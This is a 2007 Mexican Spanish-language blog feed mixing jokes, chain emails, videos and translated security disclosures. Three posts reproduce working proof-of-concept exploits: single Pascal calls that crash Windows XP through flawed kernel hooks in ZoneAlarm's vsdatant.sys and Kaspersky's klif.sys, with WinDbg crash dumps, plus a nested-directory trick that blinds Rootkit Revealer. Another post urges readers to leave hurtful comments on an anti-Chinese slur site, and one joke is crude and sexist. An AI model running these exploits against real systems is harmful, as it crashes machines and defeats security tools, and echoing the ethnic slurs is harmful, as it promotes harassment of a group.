http://www.asciimation.co.nz/


PD... Apoyo al Mixel... pasen el video de la chica sexi del cbtis 15

19

Jun

El vampiro Fronterizo

Este video es muy educativo y tiene una moraleja muy buena



Hay que parender INGLÉS

pd. sigo queriendo el video de la chica sexy del cbtis

19

Jun

Pinches chinos esta de vuelta

Y ahora viene recargada y con nuevos bríos, esta página que ha dado mucho de que hablar por tirarle mierda al esos pinches chinos que si la neta se la maman, el día de hoy en la mañana apareció en el noticiero de TV Azteca en la mañana, lo más raro es que no dijeron la dirección ni el nombre de la página, por el simple hecho de llamarse pinches chinos, pero bueno para nosotros que sabemos el nombre y conocemos la página es fácil reconocerla. Así que ha visitar y colocar comentarios hirientes contra los pinches chinos en http://pincheschinos.blogspot.com/

porque los chinos se la maman...http://pincheschinos.blogspot.com/

19

Jun

video de la chica sexy del cbtis 15

debido a un correo de adsense diciendo que teniamos que remover el contenido de esta entrada, lo hemos cambiado a esta otra dirección, en cla cual no hay nuncios ADsense

Video de la chica sexy del cbtis 15

18

Jun

Yo y mis lentes de contacto

Pues si esta entrada solo es para presumir que ya me compre mis lentes de contacto jiji los cuales me costaron 860 pesotes y se supone qeu duran un año, cosa que habra que comprobar...

18

Jun

Exploit para Zone Alarm

El otro dia posteamos un exploit para KAV y ahora le toco el turno a Zone Alarm, un firewall muy usado por su servidor.
El post original esta en ingles aquí


ZoneAlarm Pro version:7.0.337.000
Driver version:7.0.337.000

Actualmente estamos trabajando con varios antivirus / firewalls y estamos probando la estabilidad de algunos de ellos . Lo cual muestra una muy mala situación. ;)

Todos adoran usar ganchos =), desafortunadamete el nivel de conocimiento de sus desarrolladores de drivers para el kernel deja mucho que desear. Simplemente no saben como manejar los ganchos en la SSDT.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreatePort pobre manejo del gancho, service id 46

NtCreatePort esta ganchada por las fucniones del driver vsdatant.sys.

Prototipo de la Función


NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);


Aquí estan un pequeño exploit que conduce a un pantallazo azul.
Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.


NtCreatePort(nil, pointer($81234567), 0, 0, 0);


Y aquí esta el analisis de este BSOD

Originally posted by windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd256, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 4

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd256

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
fc65bd48 804df06b 00000000 81234567 00000000 vsdatant+0x33256
fc65bd64 7c90eb94 badb0d00 0012fe10 00000000 nt+0x806b
fc65bd68 badb0d00 0012fe10 00000000 00000000 0x7c90eb94
fc65bd6c 0012fe10 00000000 00000000 00000000 0xbadb0d00
fc65bd70 00000000 00000000 00000000 00000000 0x12fe10


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33256

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Otro exploit con la misma técnica para el mismo firewall.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreateWaitablePort, service id 56

NtCreateWaitablePort es otra función ganchada por el driver.

Function prototype

NTSYSAPI
NTSTATUS
NTAPI
NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);



Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.

NtCreateWaitablePort(nil, pointer($81234567), 0, 0, 0);


Esto lleva inmediatamente a un BSOD


analisis en windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd336, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 5

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd336

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f89ded48 804df06b 00000000 81234567 00000000 vsdatant+0x33336
f89ded64 7c90eb94 badb0d00 0012fe10 f90f5d98 nt+0x806b
f89ded68 badb0d00 0012fe10 f90f5d98 f90f5dcc 0x7c90eb94
f89ded6c 0012fe10 f90f5d98 f90f5dcc 00000000 0xbadb0d00
f89ded70 f90f5d98 f90f5dcc 00000000 00000000 0x12fe10
f89ded74 f90f5dcc 00000000 00000000 00000000 0xf90f5d98
f89ded78 00000000 00000000 00000000 00000000 0xf90f5dcc


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33336

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Estamo seguros que existen otros ganchos codificados de una manera deficiente, mas ya no seguimos probando otros.


Saludos
EP_X0FF/UG North

17

Jun

Argentinos Polo Polo

Andando navegando para perder el tiempo y olvidarme del trabajo con productores, predios, cultivos y demas (cuando terminemos el trabajo les informaremos mas sobre esto, es una odisea) me encontre este pequeño video algo ya clasico que se haga con los chistes de polo polo, aqui se los dejo...


16

Jun

Hackeando al estilo Matrix

Por casualidad me tope con este video de trinity hackeando la red electrica de la matrix. En este video se puede observar que usa el sshnuke y que esta dentro de una red privada del tipo 10.0.0.0 lo que nos da un total de 16777216 computadoras. o cual es un desperdicio jaja son muchas maquinas para las pocas que se usan realmente.
pero en fin... esta chido...





16

Jun

Algunos matrimonios terminan bien, otros duran toda la vida...

16

Jun

La mujer y el psicólogo

Este es un buen chiste que llego via una cadena de esas del correo

Mujer: ¡Estoy desesperada Doctor!

Psicólogo: ¿Qué le pasa señora?

Mujer: ¡Mi marido es un hijo de su pinché madre!

Psicólogo: Pero ¿por qué dice eso? ¿Qué le ha hecho?

Mujer: Él, él... él me besó.

Psicólogo: ¿cómo? a ver, hagámoslo (Toma a la mujer y la besa).
Psicólogo: ¿Soy yo acaso un hijo de mi pinché madre?

Mujer: No, Doctor, pero... ¡el me manoseó! y...

Psicólogo: A ver, a ver... (Toma a la mujer y la manosea).
Psicólogo: ¿Soy yo acaso un hijo de mi pinché madre?

Mujer: No, Doctor... pero él además me hizo el amor, y...

Psicólogo: A ver, a ver... (Desnuda a la mujer y le hace el amor).
Psicólogo: Y bien, ¿soy yo acaso un hijo de mi pinché madre?

Mujer: No, Doctor, ¡pero él tiene SIDA!

Psicólogo: ¡H I J O D E S U P I N C H E M A D R E!

15

Jun

Fallas en el reconocimiento de malware

Programas antivirus de varias compañías de nivel mundial han fallado en la mayor prueba de malware la VB100

Los productos de Kaspersky, Grisoft, y F-Secure han fallado en detectar el 100% del malware que se encuentran en la base de datos de Virus Bulletin, anqué en alguna ocasión ya habían pasado esta prueba.

De los 37 productos probados, 10 fallaron al momento de demostrar sus habilidades de detección necesitarías para obtener la certificación VB100.

Kaspersky Anti-Virus 6.0.2.621 fallo en detectar el gusano de internet llamado allaple. De acuerdo con el consultor de tecnología de Kaspersky, David Emm, Kaspersky había agregado la firma para el gusano en Febrero. Sin embargo al momento de la prueba, Kaspersky se encontraba "optimizando" la firma del allape, y la firma no se encontraba en la base de datos de Kaspersky.

Grisoft AVG 7.5 professional Edition también fallo en el VB100. AVG es una aplicación antimalware gratuita muy conocida, que tiene una gran aceptación.

Larry Bridwellm el estratega general de seguridad de Grisoft, dijo que la parte de este anti-malware, AVG 7.5 Professional Edition, que detecta firmas ha fallado al detectar una de las variantes del Troyano Agobot, pero que la parte anti-spyware del producto lo había detectado. "Las pruebas son al momento de accesar los archivos a nivel hardware" comento Bridwell. Cuando se probo el AVG 7.5 Professional Edition, encontramso el bot en la parte del anty spyware, la cual es sobre demanda [el programa tiene que iniciarse de forma manual]. Deberíamos de haber detectado el malware al momento del acceso.

Al igual que Kaspersky el servicio de protección para clientes de F-Secure (7.00 buil 387) fallo al detectar el Allaple. La compañía dijo que había cometido un error al no enviar las últimas actualizaciones de su base de datos. "El producto enviado a la prueba no incluía las ultimas actualizaciones", comentó F-Secure. "El programa que probado off line, lo cual no permitió al programa actualizarse a la ultima versión en la base de datos. En el ambiente del usuario normal la base de datos se hubiera actualizado de manera automática.

Todas estas pruebas fueron realizadas en Windows XP.

13

Jun

La gran mentira de que el messenger cobrara

La verdad es que estoy arto de recibir esta cadena:

HOLA SOY JOHN DIRECTOR DE MSN. PERDON POR LA INTERRUPCION, PERO MESSENGER
SE CERRARA. ESTO ES PORQUE MUCHAS PERSONAS DESCONSIDERADAS TIENEN VARIAS
CUENTAS DIFERENTES. NOSOTROS SOLO TENEMOS 578 CUENTAS LIBRES, POR ESTO EL
USO DE MSN Y HOTMAIL TENDRA UN COSTE A PARTIR DEL VERANO DEL 2007. SI
MANDAS ESTE MENSAJE A 18 PERSONAS DIFERENTES (COMO MINIMO) DE TU LISTA, TU
ICONO DE MSN SE VOLVERÁ AZUL, LO QUE SIGNIFICA QUE VA A SER GRATIS PARA TI.
SI NO LO CREES VE A (www.msn.com) Y MIRALO POR TI MISMO. SI QUIERES QUE
CERREMOS TU CUENTA NO MANDES ESTE MENSAJE, PERO SI QUIERES CONSERVARLA
ENTONCES MANDA ESTE MENSAJE A 18 DE TUS CONTACTOS, ESTO NO ES UNA BROMA,
MANDALO. NO REENVIES ESTE MENSAJE COPIALO Y PEGALO EN UNO NUEVO, PARA QUE
LAS PERSONAS PUEDAN LEERLO BIEN.....


¿A quién chingados se le ocurrió semejante pendejada? Realmente creen que Microsoft va a renunciar a su negocio millonario del Messenger.

Imagínense ustedes cuantos usuarios tiene el Messenger les gusta 100 Millones en el mundo y eso bajita la mano, bien ahora imaginense que cada minuto te muestra diferente publicidad en la parte de abajo de tu messenger, el hecho de si lo tienes visible o no eso otra cosa, pero bien eso equivale a que cada minuto se hacen 100 Millones de impresiones de publicidad, si cobraran digamos 0.000015 Dll's o 05 Centavos de dollar por impresión es decir cada vez que el anuncio sale en tu messenger. Bien ahora multipliquemos eso por 100 Millones eso seria cada minuto ahora multiplícalo por 60 minutos que dura una hora y después por 24 que son las horas del día bien ¿qué resultado te da?
pues la nada despreciable cantidad de 216,000 Dollares al día.
Ahora a esto hay que sumarle el costo de tener un botón en la barra lateral del messenger.
Ahora si usas el messenger normalmente usaras hotmail y adivina que ahí también tenemos publicidad y pues siguen subiendo las ganancias.

Después de esto todavía crees que a Microsoft le importa un comino si tu tienes 10 20 o 30 cuentas, la verdad es que no, mientras sigas usando el Messenger.
así que la próxima vez que alguien te diga que van a cobrar por usar el Messenger de mi parte dile que se vaya mucho a la ##$·#%&( que no mame nadie esta tan pendejo como para perder un negocio de varios millones de dollares al año.

Así que no te dejes confundir y no creas todo lo que vez.

13

Jun

Girando las Baquetas

Alguna vez ya les había puesto como tocar molinos de viento en guitarra, y pues esa bien mucha gente sabemos tocar guitarra, pero de lo que si no se nada es de como tocar batería y no se diga del uso de las baquetas.

Pues bien un amigo (el apodaca) ha publicado en su blog Bloggeando este vídeo de como dar vuelta alas baquetas.. el cual es muy ilustrativo y te enseñara a ser todo un virtuoso en el arte de la batería.

espero que les sea de utilidad

11

Jun

Google Vs Microsoft ¿quíen ganara?

Por medio de esta noticia me entero de que Google planea demandar a Microsoft si no es que ya lo hizo actualmente. ¿Pero porque? Bueno la respuesta es la barra de búsqueda en el escritorio del nuevo Windows Vista, la cual parece ser que no se puede desinstalar de una manera fácil o de plano es imposible.

Hace ya algún tiempo que estos dos gigantes han tenido sus altercados y que normalmente Microsoft tiene que someterse a ciertas normas dictadas por jueces y más pero como el tiempo ha dejado ver, a Microsoft no le importa jugar limpio, esto es si Microsoft encuentra alguna forma nueva de cerrarle las puertas a la competencia pues ténganlo por seguro que lo hará.

Esperemos que esto llegue a buen termino y Microsoft provea alguna manera rápida de desinstalar su barrita de búsqueda en el escritorio.

Saludos

11

Jun

Vulnerabilidad en Rootkit Revealer

Hoy les traigo otro exploit el cual tiene que ver con Rootkit Revealer, es una traducción directa del texto publicado por EP_X0FF en los foros de sysinternals aquí
nota:
Solamente usenlo si realmnente saben lo que hacen...

Rootkit Revelaler (RKR) es un detector de Rookits muy conocido el cual es usado para revelar algunos rootkits de modo usuario así como algunas cuantas cosas del modo kernel.

Puede detectar archivos ocultos haciendo lecturas de modo RAW y usando su propio parser para el sistema de archivos. Puede detectar entradas ocultas en el registro volcando directamente desde el disco por medio de un driver y la función ZwSaveKey y utilizando su propio parser para esto.

Existen varias maneras de sobrepasar completamente a RKR, pero el detector mismo puede ayudarte a sobrepasarlo. Esta vulnerabilidad esta presente en todas las versiones de RKR inclusive en las más antiguas versiones de línea de comando.

El objetivo principal del exploit es usar restricciones del sistema de archivos que también están presentes en RKR. El exploit crea un árbol de 1024 directorios es decir cada uno esta dentro del anterior, y después copia calc.exe (la calculadora de windows) en el último directorio creado con el nombre “test.exe”. Después de crear este exploit cualquier escaneada al disco con RKR será completamente inútil, porque cuando RKR pase por el directorio del exploit este comenzara a mostrar todo los directorios y archivos como "Visible in Windows API, MFT, but not in directory index".

Usando este exploit con las viejas versiones de consolas genera un error de violación de acceso.

El codigo del exploit se muestra a continuación…

Advertencia:

Debido a las raices del Sitema de Archivos y a las restricciones de la Ínterfaz Grafica de Windows no es sencillo eliminar el exploit del disco. Así que no lo uses en una maquina real si no sabes como eliminar el archivo.

var

i: integer;

buf: array[0..100000] of wchar;

buf2: LBuf;

begin

memzero(@buf, sizeof(buf));

GetWindowsDirectoryW(buf2, MAX_PATH);

strcpyW(buf, '\\?\C:\adir');

CreateDirectoryW(buf, nil);

for i := 0 to 1023 do

begin

strcatW(buf, '\adir');

CreateDirectoryW(buf, nil);

end;

strcatW(buf, '\test.exe');

strcatW(buf2, '\calc.exe');

CopyFileW(buf2, buf, false);

end;

Este no es un exploit “puro” debido a que no genera escalación de privilegios. Este se puede clasificar como uno del tipo DoS (Denegación del Servicio).

Para corregir esta vulnerabilidad es necesario modificar RKR para soportar rutas UNC.

09

Jun

¿QUIÉN DIJO QUE LOS MEXICANOS SOMOS POBRES?

Esta es un acadena que me llego y que por el contenido que tien me agrado par estar aquí van muy acorde a mis pensamientos


¿QUIÉN DIJO QUE LOS MEXICANOS SOMOS POBRES?

Un mexicano le envía un Mail con una pregunta a otro
mexicano, que radica en los EE.UU.

¿Por qué los mexicanos somos pobres?

Respuesta del mexicano que vive en EE.UU.

Juan, cómo se ve que los árboles no te dejan ver el bosque.

Cómo puedes llamarte pobre, cuando eres capaz de pagar por un metro cúbico de agua más del doble de lo que pago yo.

Cuando te das el lujo de pagar tarifas de electricidad y de teléfono un 60% más caras de lo que me cuestan a mí.

Pagar comisiones por servicios bancarios y tarjetas de crédito del triple de lo que aquí nos cuestan, O cuando por un carro que a mi me cuesta US $ 20,000 tú puedes pagar US $38,000 porque tú sí puedes darte el gusto de regalarle $ 18,000 dólares al gobierno y
nosotros no;

¡Juan, NO TE ENTIENDO!

Pobres somos nosotros, los habitantes de la Florida, Por eso el Gobierno Estatal, teniendo en cuenta nuestra precaria situación financiera, nos cobra sólo el 2% de IVA (hay otro 4% que es Federal; total = 6%)

Y no 15% como a ustedes los ricos que viven en México.

Además, son ustedes los que tienen "Impuestos de Lujo" como:
El IEPS (por gasolina y gas, alcohol, cigarros, puros,cerveza, vinos,etc.)
que alcanza hasta el 120% del valor original, y los otros
como:

ISR (impuesto sobre las utilidades y sueldos),

ISAN, (impuesto sobre automóviles nuevos),

RENAVE, (registro nacional de vehículos),


IMPUESTO AL ACTIVO, (impuesto a los bienes de las empresas),

IMPUESTO A LOS INVENTARIOS, (impuesto a las mercancías de las empresas),

TENENCIAS y PLACAS (impuesto por uso de automóvil), 2% s/NOMINA, (impuesto al valor de nómina de las empresas además el IMSS Y EL SAR), 2% s/HOSPEDAJE; (impuesto adicional por renta de habitación hotelera) Y dichoso que todavía te das el lujo de pagar IVA por estos
impuestos.

Además de todos los tramites y pagos estatales y municipales.

Porque si ustedes no fueran ricos, ¿qué sentido tendría tener unos impuestos de ese calibre? ¿POBRES?, ¿de dónde? Un país que es capaz de cobrar el ISR POR ADELANTADO como
México, necesariamente tiene que nadar en la abundancia porque considera que los negocios de la nación y de todos sus habitantes siempre tendrán ganancias a pesar de saqueos y asaltos, mordidas, huracanes, temblores e inundaciones y por supuesto de seguro que todos deben de ganar muchísimo.

Los pobres somos nosotros que NO pagamos Impuesto sobre la
Renta si ganamos menos de US $3,000 al mes POR PERSONA (más o menos 35, 000.00 pesos mexicanos)
Y allí pagan policía privada, mientras que nosotros nos conformamos con la pública.

Allí hasta envían a los hijos a colegios privados y mira si seremos pobres aquí en EE.UU., que las escuelas publicas te prestan los libros de estudio previendo que no tienes con qué comprarlos.

A veces me asombra la riqueza de los mexicanos que piden un
préstamo cualquiera, y son capaces de pagar 38% anual de intereses,
como mínimo.

¡¡¡ ESO ES SER RICO!!!


No como aquí, que apenas llegamos al 8% (generalmente 7.8%),
justamente porque NO estamos en condiciones de pagar más.

Supongo que, como todo rico, tienes un carro y que estás pagando un 8 o 10% anual de seguro; si te sirve de información, yo pago solo US $ 345 por año. Y como te sobra el dinero, tú si puedes efectuar pagos anuales de aproximadamente US $ 1,000 por concepto de eso que ustedes llaman TENENCIA, mientras que acá nosotros no podemos darnos esos lujos y cuando mucho pagamos US $ 15 dólares anuales por el STICKER sin importar qué modelo de auto manejes, pero, claro, eso es para gente apretada de recursos que no puede erogar los enormes flujos que ustedes los mexicanos manejan.

Saca la cuenta. ¿Quién es el rico, y quién el pobre?

Por ultimo, más del 20% de la población económicamente
activa en México NO TRABAJA.

Aquí, en cambio, solo hay un 4% en la misma situación.

¿No te parece que el vivir sin trabajar es un lujo que sólo
los ricos se pueden dar?

Vamos, mano; te quedaste en México porque eres RICO.

Son los pobres como yo los que nos fuimos a probar suerte a
otros lados.

Me contaron también que a los funcionarios federales,
estatales y

municipales, les paga el pueblo una lanota de sueldo. Y a
los negociotes esos que montan los políticos llamados Partidos.

Qué envidia ¡¡ESO SÍ ES VIVIR EN LA RIQUEZA !!

Bueno Juan te mando un abrazo y ahí luego me platicas cómo
les va con el nuevo presupuesto del año próximo, lo que sí es seguro es
que les endilgarán más impuestos.

Pero, bueno, eso es lo de menos cuando se tiene
Lana para pagarlos.

Atentamente:

Tú pobre amigo inmigrante.

P.D. SI NO LO REENVIAS NO PASA ABSOLUTAMENTE NADA Y SI
DECIDES

HACERLO.. POSIBLEMENTE SE ENCABRONEN OTROS IGUAL QUE TU Y
NUESTROS

GOBERNANTES RECIBAN MAS MENTADAS DE MADRE.. UNETE AL
MOVIMIENTO,

REQUERIMOS MAS CORAJE GRUPAL.

y



AGREGADO POR UN INMIGRANTE DESDE EEUU


ES CIERTO MUCHO DE LO EXPRESADO ANTERIORMENTE PERO QUE NO SE CUELGUEN
EN MEXICO TU COMPRAS UNA CASA DE ASISTENCIA SOCIAL NUEVA POR ALGUNOS 110,000 PESOS (10,000 USD) QUE NO TE SIRVEN PARA EL DOWN PAYMENT OSEA EL ENGANCHE EN EEUU NI MADRES QUE PASA ESO POR MUY JODIDA QUE ESTE LA CASA NO TE BAJAN DE ALGUNOS CUANTOS CIENTOS MILES DE DOLARES OSEA MILLONES DE PESOS MEXICANOS CON LO QUE EN MEXICO COMPRARIAS UNA RESIDENCIA BASTANTE MUY COMODA TE CHINGAN EN CADA COSA QUE COMPRES CON UN IMPUESTO INVISIBLE EN ALGUNOS PRODUCTOS
ALGUNAS VEZ SE HAN TOMADO UNA COCA COLA DE 17 PESOS EN SU PRESENTACION DE MEDIO LITRO AHHH
PUES ACA SI PORQUE ASI COBRAN ESTOS CABRONES.
DESDE MI PUNTO DE VISTA LA CULPA DE LA JODIDES DE MEXICO RADICA EN LOS CIUDADANOS QUE DESGRACIADAMENTE NO EJERCEMOS NUESTRA AUTORIDAD COMO PUEBLO Y MANDAR A LA CHINGADA A NUESTROS GOBERNANTES QUE CADA VEZ SE HACEN MAS RICOS ESOS WEYES SI QUE SON RICOS , SI NO VEAN SUS CUENTAS EN EL EXTRANJERO Y SUS PROPIEDADES

EJERZAN SU DERECHO AL VOTO Y ELIJAN AL CANDIDATO MENOS PEOR , MENTANDOSELAS NO GANAMOS NADA LO MEJOR ES QUE VAYAN Y VOTEN, QUE LA PEREZA NO NOS GANE PORQUE ESO SIGNIFICA QUE A TI TE VALE MADRE QUE A MEXICO SE LO ESTE LLEVANDO LA CHINGADA , PORQUE TU , YO Y TODA LA GENTE QUE NOS RODEA TAMBIEN SOMOS MEXICO


LA VOZ DEL PUEBLO ES LA VOZ DE DIOS

P.D

VIVA MEXICO CABRONES !!!!!!!

09

Jun

Klif.sys calling NtOpenProcess vulnerability

Después de que ayer se publicara acerca de la Vulnerabilidad de KAS 7.0 Kaspersky Lab reacciono diciendo que no fueron notificados a tiempo con todo y que la vulnerabilidad tenia un año o mas he aquí lo que Kaspersky respondió hoy

El enlace original en ingles

Un consultor (EP_X0FF), recientemente ha publicado en rootkit.com acerca de una vulnerabilidad en KAV 7.0. Desafortunadamente el autor de este material no se ha apegado a la practica estándar de la industria, de contactar a la empresa desarrolladora antes de divulgar los detalles de la vulnerabilidad. Aunque el autor afirma que todos los intentos de informar a Kaspersky Lab acerca de esta vulnerabilidad, fueron ignorados, este no ha sido el caso: Si hubiéramos sido informados, este hecho hubiera sido resuelto desde mucho tiempo atrás.

Los siguientes productos son vulnerables:

Kaspersky Internet Security 6.0/7.0
Kaspersky Anti-Virus 6.0/7.0
Kaspersky Anti-Virus for Windows Workstations 6.0
Kaspersky Anti-Virus 6.0 for Windows Servers

Estos productos son vulnerables solo cuando se ejecutan en los siguientes SOs:


Windows NT
Windows 2000
Windows 2003 x86
Windows XP x86
Productos corriendo en otros SO de Microsoft no son afectados por este percance.

Esta vulnerabilidad esta clasificada como de bajo riesgo debido a la naturaleza de la misma: El usuario tiene que lanzar el exploit manualmente en su computadora. El resultado de explotar esta vulnerabilidad es un error critico del sistema (BSOD) pero no hay una escalación de privilegios o provee algún control de el equipo en forma remota.

Un parche para esta vulnerabilidad sera lanzado en estos días. El parche se instalara estomáticamente. Daremos mas información cuando se lance el parche.




Seguramente que a los señores de KAV esta información no les cayo muy en gracia pero en fin alguine la tenia que publicar...

Saludos

09

Jun

Alumnos contra servidores publicos

Bueno, ayer me entere de que hubo disturbios en la via publica por parte de alumnos de diferentes escuelas, principalmente prepas (cbtis 89, de cuya fuente obtuve la informacion). Todo esto ocurrio frente al Instituto Tecnologico de Durango... y bueno, la historia comienza asi.....
En la mañana de el dia 8 de junio de 2007 los policias judiciales agarran a 2 estudiantes con la excusa de que cargaban droga, sin mas ni mas comienzan a golpearlos, para despues registrarlos y darse cuenta de que no traian nada de alcaloides, pero el mal estaba hecho (para su desgracia)...
Poco despues los alumnos del tecnologico comenzaron a secuestrar patrullas y otros vehiculos de servicio publico a manera de queja contra los sucesos acontecidos ese mismo dia, pero creo que las cosas se salieron de control cuando comenzaron a salir los alumnos de las prepas, ya que las cosas se salieron completamente de control, habia "estudiantes" saltando y gritando en el camellon del blvd Felipe Pescador, voltearon una de las patrullas que tenian secuestradas, abollaron un camion de basura que iba pasando, entre otras cosas, para no hacerselas mas de emocion, les dejo las pruebas videograbadas para que no digan que estoy inventando.....
Y como ultimo comentario, solo creo (a manera muy personal) que esta no es la forma de reclamar algo, esta bien que queramos ser escujados y exigir justicia, existen otras formas de lograrlo y creo que sin haber volcado la patrulla y abollado los camiones lo hubieran logrado de una buena manera... ese es mi comentario





[en un rato mas pongo el otro video que falta]

08

Jun

BUGS en la (Proactive Defense) de Kaspersky Antivirus

Esta es una traducción de una entrada que hizo el buen EP_X0FF en los foros de sysinternals
y que pueden leer en ingles aquí

El bien conocido antivirus Kaspersky, desde hace un buen tiempo sufre de un bug muy peligroso, el cual permite tronar el sistema protegido por este antivirus, aun desde la cuenta de invitado.

Todos los intentos de avisar a
Kaspersky Lab sobre esta vulnerabilidad han sido ignorados. Este material fue mostrado varios años atras, y en el ultimo verano publicamos un nuevo exploit para Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem. Y despues de este tiempo nada ha cambiado. Aun ahora con la nueva version Kaspersky AV 7.0 este exploit sigue funcionando muy bien.
El objetivo principal de este exploit es hacer una llamda a NtOpenProcess con parametros invalidios. Esta funcion esta intervenida (hooked) por el diver de Kaspersky llamdo klif.sys y la reazon para este intercepción es obia - Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso, esto es muy usado por el malware.

Aqui el prototipo de esta función

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );


Aquí un pequeño exploit codificado en pascal(funciona para el klif.sys vesion 6.12.10.280 y versiones previas)


var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;

Como podran ver el ultimo parametro es la dirección de la estructura CLIENT_ID, la cual apunta hacia una región aleatoria dentro de la memoria del kernel.
al probar el xploit en una instalación limpia de windows XP , sin KAV -no hay BSOD(Blue Screen Of Death o Pantallazo azul).

Al ejecutarlo en un Windows XP protegido por KAV 7.0 -inmediatamente tenemos un BSOD - PAGE_FAULT_IN_NONPAGED_AREA.

Pero ¿Porque pasa esto? la respuesta es muy sencilla. Supongo que el codigo fuente de el hook en NtOpenProcess es algo como esto:

NTSTATUS NewNtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
__try
{

if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED;

else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
ObjectAttributes, ClientId);
__except (EXCEPTION_EXECUTE_HANDLER)
{
... stuff here ...
}
}

El gran problema aquí es
ClientId->UniqueProcess, ya que ClientId es un PUNTERO a una estructura. El hecho de accesar a una región invalida de memoria produce inmediatamente un PAGE_FAULT_IN_NONPAGED_AREA.


el exploit original fue creado por Ms-Rem y luce así


NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);

Comopodras observar los desarrolladores de KAV han usado un bloque try/except, y parece ser que no saben usar otro tipo de funciones manejadoras de erores.

Esperemos que los desarrolladores de Kaspersky Antivirus descubran el fabuloso programa llamado NtCall y corrigan su bug.


*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
